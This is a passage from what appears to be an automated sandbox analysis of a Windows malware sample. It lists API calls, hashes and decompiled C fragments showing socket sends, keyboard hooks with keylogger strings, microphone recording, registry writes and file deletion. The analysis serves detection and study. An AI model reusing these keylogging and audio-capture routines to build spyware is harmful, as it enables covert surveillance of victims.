                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403735
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                          • String ID:
                                          • API String ID: 4257247948-0
                                          • Opcode ID: 282da47049af24501e856da2357ac17247e55dafe8a2a8a5931536da7051f424
                                          • Instruction ID: dac1581c1d28e517801eb3be04acf8c600069e7031f390e60f55bb430ac4377d
                                          • Opcode Fuzzy Hash: 282da47049af24501e856da2357ac17247e55dafe8a2a8a5931536da7051f424
                                          • Instruction Fuzzy Hash: B2F0C97140461AAFCB14DFA4DC8C9DAB7FCFE5820870008A9A183D3510EA75F64ACB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • socket.WS2_32(00000000,00000001,00000006), ref: 004025F9
                                          • connect.WS2_32(00000000,00415278,00000010), ref: 00402608
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000006,?,?,00408D8C), ref: 0040261B
                                            • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040250E
                                            • Part of subcall function 00402504: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DataStart]0000,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402522
                                            • Part of subcall function 00402504: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040252D
                                            • Part of subcall function 00402504: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402541
                                            • Part of subcall function 00402504: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040254D
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402556
                                            • Part of subcall function 00402504: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402561
                                            • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 00402570
                                            • Part of subcall function 00402504: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040257A
                                            • Part of subcall function 00402504: send.WS2_32(?,00000000), ref: 00402584
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025DB
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025E4
                                          • closesocket.WS2_32(00000000), ref: 00402630
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00415278,00000010,00000000,00000001,00000006,?,?,00408D8C), ref: 0040263B
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@V01@@$??4?$basic_string@?data@?$basic_string@?empty@?$basic_string@A?$basic_string@D@1@@D@2@@0@Hstd@@V01@V10@0@V?$basic_string@closesocketconnectsendsocket
                                          • String ID:
                                          • API String ID: 2015417588-0
                                          • Opcode ID: afd6ee4ba49ead645863e6814483f123e0b3b1fe0a8a6986ee26414a986e6055
                                          • Instruction ID: 3ac3c1af87fc4ba09d50238af9d46122a468a8ea4431591f33cc56d3a1d2174b
                                          • Opcode Fuzzy Hash: afd6ee4ba49ead645863e6814483f123e0b3b1fe0a8a6986ee26414a986e6055
                                          • Instruction Fuzzy Hash: 42F0A73164111537D62076759D0ABDB3A188B12795F00017AFD05B61C1EAF9894482DD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040E4FD
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040E511
                                          • ?find_last_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00411844,73115DF0), ref: 0040E526
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040E535
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E53E
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?find_last_of@?$basic_string@?substr@?$basic_string@D@1@@FileModuleNameV12@
                                          • String ID:
                                          • API String ID: 2641972318-0
                                          • Opcode ID: d402ba14c3a2e1978bc613bd61c4e803cb42440e16ad61c5612e90c530be73d1
                                          • Instruction ID: 1e1a59f65a474f258a2f266179515592e576b6157cd272470b44933d2ea38500
                                          • Opcode Fuzzy Hash: d402ba14c3a2e1978bc613bd61c4e803cb42440e16ad61c5612e90c530be73d1
                                          • Instruction Fuzzy Hash: 83F0D07150010FEFDF44DF94ED4AFED7B78EB04309F108061B605A61A0DAB0AA89CF65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 25%
                                          			E0040520C(CHAR* __eax, void* __ecx) {
                                          				CHAR* _t5;
                                          				signed int _t8;
                                          				signed int _t9;
                                          				void* _t15;
                                          
                                          				_t15 = __ecx;
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				_t5 = DeleteFileA(__eax);
                                          				_t9 = _t8 & 0xffffff00 | _t5 != 0x00000000;
                                          				__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t15 + 0x60, 0x410668);
                                          				if(_t5 != 0) {
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					RemoveDirectoryA(_t5);
                                          				}
                                          				return _t9;
                                          			}







                                          0x0040520e
                                          0x00405213
                                          0x0040521a
                                          0x00405222
                                          0x0040522e
                                          0x00405238
                                          0x0040523c
                                          0x00405243
                                          0x00405243
                                          0x0040524d

                                          APIs
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004156C0,74B5FBA0,00405285), ref: 00405213
                                          • DeleteFileA.KERNEL32(00000000), ref: 0040521A
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415660,00410668), ref: 0040522E
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040523C
                                          • RemoveDirectoryA.KERNEL32(00000000), ref: 00405243
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@D@2@@std@@$??9std@@D@2@@0@DeleteDirectoryFileRemoveV?$basic_string@
                                          • String ID:
                                          • API String ID: 485653077-0
                                          • Opcode ID: 3979d79b3fe9aba7c53ae26c4f3c4978edfa256f4a3cec73ad257c73c55fecea
                                          • Instruction ID: 49b04f277348f71567298f07d152f4b3d3d547bd3422a61795910190b4fb5562
                                          • Opcode Fuzzy Hash: 3979d79b3fe9aba7c53ae26c4f3c4978edfa256f4a3cec73ad257c73c55fecea
                                          • Instruction Fuzzy Hash: C3E086762416219BCA041BF0AC0C9CB371CAE45212300417BF402E36A0CFF98CC48B5C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036C7
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036D0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036D9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036E2
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036EB
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@
                                          • String ID:
                                          • API String ID: 2599707790-0
                                          • Opcode ID: ac5247aa85bbd6be4254a4db4df1c1c2bebf39489b54b834f55a8b66f66bf73a
                                          • Instruction ID: ce469ae2fa8136e1a9f0fe53df6847e3631b9c5038cfbca0e221b482f1c808aa
                                          • Opcode Fuzzy Hash: ac5247aa85bbd6be4254a4db4df1c1c2bebf39489b54b834f55a8b66f66bf73a
                                          • Instruction Fuzzy Hash: A8E00A31210557CBC7249F30EA5C4E5B764BA91619300447A9157515B0DFB4AD49CB5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040908B(void* _a4, void* _a8, char _a12, char _a16) {
                                          				long _t14;
                                          
                                          				if(RegCreateKeyA(_a4, _a8,  &_a8) != 0) {
                                          					return 0;
                                          				} else {
                                          					_t5 =  &_a12; // 0x415268
                                          					_t14 = RegSetValueExA(_a8,  *_t5, 0, 0xb,  &_a16, 8);
                                          					return RegCloseKey(_a8) & 0xffffff00 | _t14 == 0x00000000;
                                          				}
                                          			}




                                          0x004090a0
                                          0x004090cf
                                          0x004090a2
                                          0x004090ad
                                          0x004090b3
                                          0x004090cb
                                          0x004090cb

                                          APIs
                                          • RegCreateKeyA.ADVAPI32(00409B23,?,?), ref: 00409098
                                          • RegSetValueExA.ADVAPI32(?,hRA,00000000,0000000B,?,00000008,00415268,?,00409B23,00000000), ref: 004090B3
                                          • RegCloseKey.ADVAPI32(?,?,00409B23,00000000), ref: 004090BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateValue
                                          • String ID: hRA
                                          • API String ID: 1818849710-819137882
                                          • Opcode ID: 47dcfed047945252874ef2030ec9f55be3ad7af594f0f386cf4e6306e2d48049
                                          • Instruction ID: 45296832074a86694a0120e67756151a47aa0ea66b010438851f7b77956f428d
                                          • Opcode Fuzzy Hash: 47dcfed047945252874ef2030ec9f55be3ad7af594f0f386cf4e6306e2d48049
                                          • Instruction Fuzzy Hash: A4E0C932540218BBDF115F90FD05FDA3B6DEB08761F00C021FE199A161D771DA609B54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?), ref: 00403605
                                          • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?), ref: 00403612
                                          • _CxxThrowException.MSVCRT(?,004119F0), ref: 00403621
                                            • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                                          Strings
                                          • invalid vector<T> subscript, xrefs: 00403600
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@free
                                          • String ID: invalid vector<T> subscript
                                          • API String ID: 2273067808-3016609489
                                          • Opcode ID: 23a2721963ee5b81bf9d54976ac51af616b6fac7c107dadb20cd092e6ff66c0e
                                          • Instruction ID: d1dc714aa17fc7b7442ac04cbb7cbb2b6be57595b17b16616ed7d09586dc421c
                                          • Opcode Fuzzy Hash: 23a2721963ee5b81bf9d54976ac51af616b6fac7c107dadb20cd092e6ff66c0e
                                          • Instruction Fuzzy Hash: F3E0487185420F7BDF04FBE1DD4ADEEB77DFA14305B504036F904A20A0EA756A4ACB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,?,?,?,?,004012A3,?,?,?,004074B7,0000000E,004108CC,00000000), ref: 004012DA
                                          • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?,?,?,?,?,004012A3,?,?,?,004074B7,0000000E,004108CC,00000000), ref: 004012E7
                                          • _CxxThrowException.MSVCRT(?,004119F0), ref: 004012F6
                                            • Part of subcall function 00401305: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00401300,?,?,?,?,004012A3,?,?,?,004074B7,0000000E,004108CC,00000000), ref: 00401312
                                          Strings
                                          • invalid vector<T> subscript, xrefs: 004012D5
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@D@1@@D@2@@std@@$??0out_of_range@std@@D@2@@1@@ExceptionThrowV?$basic_string@
                                          • String ID: invalid vector<T> subscript
                                          • API String ID: 4148323614-3016609489
                                          • Opcode ID: 9661a228b2e9748f7b8567c3925db49a400b5d1eaa57c5b6f529c0f008786bf5
                                          • Instruction ID: 885d5109308db86c39cf624aab1bba59d6d0b6b2a3733cbd4a3c7a04b8bfaa9f
                                          • Opcode Fuzzy Hash: 9661a228b2e9748f7b8567c3925db49a400b5d1eaa57c5b6f529c0f008786bf5
                                          • Instruction Fuzzy Hash: 53E0127181410FAADB04F7E5D94ADED777CB9043057600036BD02B24E1DAB855498B2A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040E4C4() {
                                          				_Unknown_base(*)()* _t2;
                                          
                                          				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
                                          				 *0x415b78 = _t2;
                                          				return _t2;
                                          			}




                                          0x0040e4da
                                          0x0040e4e0
                                          0x0040e4e5

                                          APIs
                                          • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 0040E4D3
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040E4DA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetLastInputInfo$User32.dll
                                          • API String ID: 2574300362-1519888992
                                          • Opcode ID: 2e41d0d454fa43021efc0d210194af18c12e8c2f34d28340e7a9680a4206e5ea
                                          • Instruction ID: c49a19daebca9e066ce9d428bbfec3a7347074465f3c8db43cf9aeb53f5350e0
                                          • Opcode Fuzzy Hash: 2e41d0d454fa43021efc0d210194af18c12e8c2f34d28340e7a9680a4206e5ea
                                          • Instruction Fuzzy Hash: 6CC092B49A0600BFC7012FB2ED0DAD83AA4A684702724C436B20AE21B4CBBD50C1DA6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040F89D() {
                                          				_Unknown_base(*)()* _t2;
                                          
                                          				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
                                          				 *0x415ba8 = _t2;
                                          				return _t2;
                                          			}




                                          0x0040f8b3
                                          0x0040f8b9
                                          0x0040f8be

                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 0040F8AC
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040F8B3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetConsoleWindow$kernel32.dll
                                          • API String ID: 2574300362-100875112
                                          • Opcode ID: 510d5923eb8639a7d885d72a367858d9807e1c659d0f746c0c92ce176c01cde6
                                          • Instruction ID: 827c4046bcd6e5c73998b2cbf4f49e030bf6490dcf6eebc42fb88a3b65635bfa
                                          • Opcode Fuzzy Hash: 510d5923eb8639a7d885d72a367858d9807e1c659d0f746c0c92ce176c01cde6
                                          • Instruction Fuzzy Hash: 69C092B5980200BFD7106FA1EC4DED93AB4AA48742720C136F60AE19B4CBBD10C19A1E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0040147C(void* __eflags, signed int _a4) {
                                          				intOrPtr _t16;
                                          				intOrPtr _t17;
                                          				intOrPtr _t19;
                                          				intOrPtr _t22;
                                          				intOrPtr _t28;
                                          				intOrPtr _t29;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				intOrPtr _t32;
                                          				intOrPtr _t33;
                                          				signed int _t36;
                                          
                                          				_t38 = __eflags;
                                          				E00401289(0x4151c0, __eflags, _a4);
                                          				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x415194);
                                          				_t36 = _a4 << 5;
                                          				_t16 = E00401289(0x4151c0, _t38, _a4);
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				_t28 =  *0x41519c; // 0x30828e8
                                          				 *((intOrPtr*)(_t36 + _t28)) = _t16;
                                          				_t17 =  *0x41519c; // 0x30828e8
                                          				_t29 =  *0x415194; // 0x0
                                          				 *((intOrPtr*)(_t36 + _t17 + 4)) = _t29;
                                          				_t30 =  *0x41519c; // 0x30828e8
                                          				 *((intOrPtr*)(_t36 + _t30 + 8)) = 0;
                                          				_t31 =  *0x41519c; // 0x30828e8
                                          				 *((intOrPtr*)(_t36 + _t31 + 0xc)) = 0;
                                          				_t32 =  *0x41519c; // 0x30828e8
                                          				 *((intOrPtr*)(_t36 + _t32 + 0x10)) = 0;
                                          				_t33 =  *0x41519c; // 0x30828e8
                                          				 *((intOrPtr*)(_t36 + _t33 + 0x14)) = 0;
                                          				_t19 =  *0x41519c; // 0x30828e8
                                          				waveInPrepareHeader( *0x415158, _t19 + _t36, 0x20);
                                          				_t22 =  *0x41519c; // 0x30828e8
                                          				return waveInAddBuffer( *0x415158, _t36 + _t22, 0x20);
                                          			}














                                          0x0040147c
                                          0x00401491
                                          0x00401498
                                          0x004014a6
                                          0x004014a9
                                          0x004014b0
                                          0x004014b6
                                          0x004014be
                                          0x004014c1
                                          0x004014c6
                                          0x004014cc
                                          0x004014d0
                                          0x004014d8
                                          0x004014dc
                                          0x004014e2
                                          0x004014e6
                                          0x004014ec
                                          0x004014f0
                                          0x004014f6
                                          0x004014fa
                                          0x00401508
                                          0x0040150e
                                          0x00401527

                                          APIs
                                          • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(?,00000000,00415268,?,00401465,00000000,?,?,?,0040B52E,00000000), ref: 00401498
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,00401465,00000000,?,?,?,0040B52E,00000000), ref: 004014B0
                                          • waveInPrepareHeader.WINMM(030828E8,00000020,?,00401465,00000000,?,?,?,0040B52E,00000000), ref: 00401508
                                          • waveInAddBuffer.WINMM(?,00000020,?,00401465,00000000,?,?,?,0040B52E,00000000), ref: 0040151E
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@?resize@?$basic_string@BufferHeaderPrepare
                                          • String ID:
                                          • API String ID: 1952094867-0
                                          • Opcode ID: c43d5b855978ab5546af03f7988427d20661d7bf7e5b36f0c6026f81f0c57d97
                                          • Instruction ID: 607d35f18d4bb3c038525a4507ad7304f57bd8fd619bab3b66f3d3b81191445e
                                          • Opcode Fuzzy Hash: c43d5b855978ab5546af03f7988427d20661d7bf7e5b36f0c6026f81f0c57d97
                                          • Instruction Fuzzy Hash: BD110D35A10A00FFCB168F55EC58BEA7BA5EBC9318700C47EEA4EC7365D671A841CB48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00404336(struct HHOOK__** __ecx) {
                                          				struct HHOOK__* _t11;
                                          				struct HHOOK__** _t17;
                                          
                                          				_t17 = __ecx;
                                          				if( *((intOrPtr*)(__ecx + 0x39)) == 0) {
                                          					L6:
                                          					return 0;
                                          				}
                                          				_t2 =  &(_t17[0xa]); // 0x0
                                          				if(TerminateThread( *_t2, 0) != 1) {
                                          					goto L6;
                                          				}
                                          				_t3 =  &(_t17[0xc]); // 0x0
                                          				_t17[0xe] = 0;
                                          				_t17[0xa] = 0;
                                          				CloseHandle( *_t3);
                                          				if(_t17[0xe] == 0) {
                                          					_t11 =  *_t17;
                                          					if(_t11 != 0) {
                                          						UnhookWindowsHookEx(_t11);
                                          						 *_t17 = 0;
                                          						TerminateThread(E0040380C, 0);
                                          					}
                                          				}
                                          				return 1;
                                          			}





                                          0x00404338
                                          0x00404340
                                          0x00404382
                                          0x00000000
                                          0x00404382
                                          0x00404349
                                          0x00404351
                                          0x00000000
                                          0x00000000
                                          0x00404353
                                          0x00404356
                                          0x00404359
                                          0x0040435c
                                          0x00404365
                                          0x00404367
                                          0x0040436b
                                          0x0040436e
                                          0x0040437a
                                          0x0040437c
                                          0x0040437c
                                          0x0040436b
                                          0x00000000

                                          APIs
                                          • TerminateThread.KERNEL32(00000000,00000000,00415A30,00415940,00415268,0040A63B,0040A71E,00000001), ref: 0040434C
                                          • CloseHandle.KERNEL32(00000000), ref: 0040435C
                                          • UnhookWindowsHookEx.USER32(00000000), ref: 0040436E
                                          • TerminateThread.KERNEL32(0040380C,00000000), ref: 0040437C
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: TerminateThread$CloseHandleHookUnhookWindows
                                          • String ID:
                                          • API String ID: 952708117-0
                                          • Opcode ID: 21f92a0503a4c508299fb2519971da6ba8f4e0d620dc769b09316a04903e5818
                                          • Instruction ID: b3774055a663eb231de0d977992da6d56e6fa1a05363ce64aae77dfed93c93a6
                                          • Opcode Fuzzy Hash: 21f92a0503a4c508299fb2519971da6ba8f4e0d620dc769b09316a04903e5818
                                          • Instruction Fuzzy Hash: 2BF0E9B22003446FD7715F644CC089BBB9DBA95360350287FEAC293A11C275EC819718
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AAD
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AC0
                                          • SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(74B06490,?,00405E64), ref: 00403AD8
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@V01@@Y?$basic_string@$??1?$basic_string@Event
                                          • String ID:
                                          • API String ID: 3911305588-0
                                          • Opcode ID: 16b6dc50432d68f6dd9f781edfb67808caec510018263165bfcd570da917996e
                                          • Instruction ID: 0779d908e9be27da86272a0c0adb87f85a3e9ee435f515b886d5906f097178b3
                                          • Opcode Fuzzy Hash: 16b6dc50432d68f6dd9f781edfb67808caec510018263165bfcd570da917996e
                                          • Instruction Fuzzy Hash: CEF08231000749EFCB11CFA0D94CED67FA9AF05345F444469E58742961DB74F988CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040ED0C(HANDLE* _a4) {
                                          				void* _t2;
                                          				void* _t3;
                                          
                                          				_t2 = GetCurrentProcess();
                                          				_t3 = GetCurrentThread();
                                          				return DuplicateHandle(GetCurrentProcess(), _t3, _t2, _a4, 0, 1, 2);
                                          			}





                                          0x0040ed1f
                                          0x0040ed22
                                          0x0040ed34

                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002,7313CB00,?,0040C570,?), ref: 0040ED1F
                                          • GetCurrentThread.KERNEL32 ref: 0040ED22
                                          • GetCurrentProcess.KERNEL32(00000000,?,0040C570,?), ref: 0040ED29
                                          • DuplicateHandle.KERNEL32(00000000,?,0040C570,?), ref: 0040ED2C
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Current$Process$DuplicateHandleThread
                                          • String ID:
                                          • API String ID: 3566409357-0
                                          • Opcode ID: 3fa07ae3144d30a73874091d85fe8529b928e5454c1455a9c948a55732be91ca
                                          • Instruction ID: a27c7ae999809b9e73f37912e12988bcc4cb6827362b4042a6689fcf131767f6
                                          • Opcode Fuzzy Hash: 3fa07ae3144d30a73874091d85fe8529b928e5454c1455a9c948a55732be91ca
                                          • Instruction Fuzzy Hash: 58D09E7194021C77D91027B5AC0EFC63E1CDB05761F008421B608A6091C6F654818BE4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [LCtrl] ,?), ref: 004050A4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                          • String ID: [LCtrl] $ [RCtrl]
                                          • API String ID: 4257247948-618823999
                                          • Opcode ID: 0168a093b53f0bbe9d1f7a75df0fb87eb8cb959a489310096b2281c4288ad07d
                                          • Instruction ID: 69a1fac85d8d50c9318be5c9ee5530278cac5bde9cdc7065c5d4e5bcd0292750
                                          • Opcode Fuzzy Hash: 0168a093b53f0bbe9d1f7a75df0fb87eb8cb959a489310096b2281c4288ad07d
                                          • Instruction Fuzzy Hash: 69E09B317006047FDA14A65DC81BEBF76ACDB40754F400167F901E72C0D9F95D4086DB
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E0040F0B5(void* __ecx) {
                                          				char _v8;
                                          				void* _t7;
                                          
                                          				if( *0x415b94 == 0) {
                                          					L2:
                                          					return 0;
                                          				}
                                          				_t1 =  &_v8; // 0x4075ea
                                          				 *0x415b94(GetCurrentProcess(), _t1);
                                          				_t7 = 1;
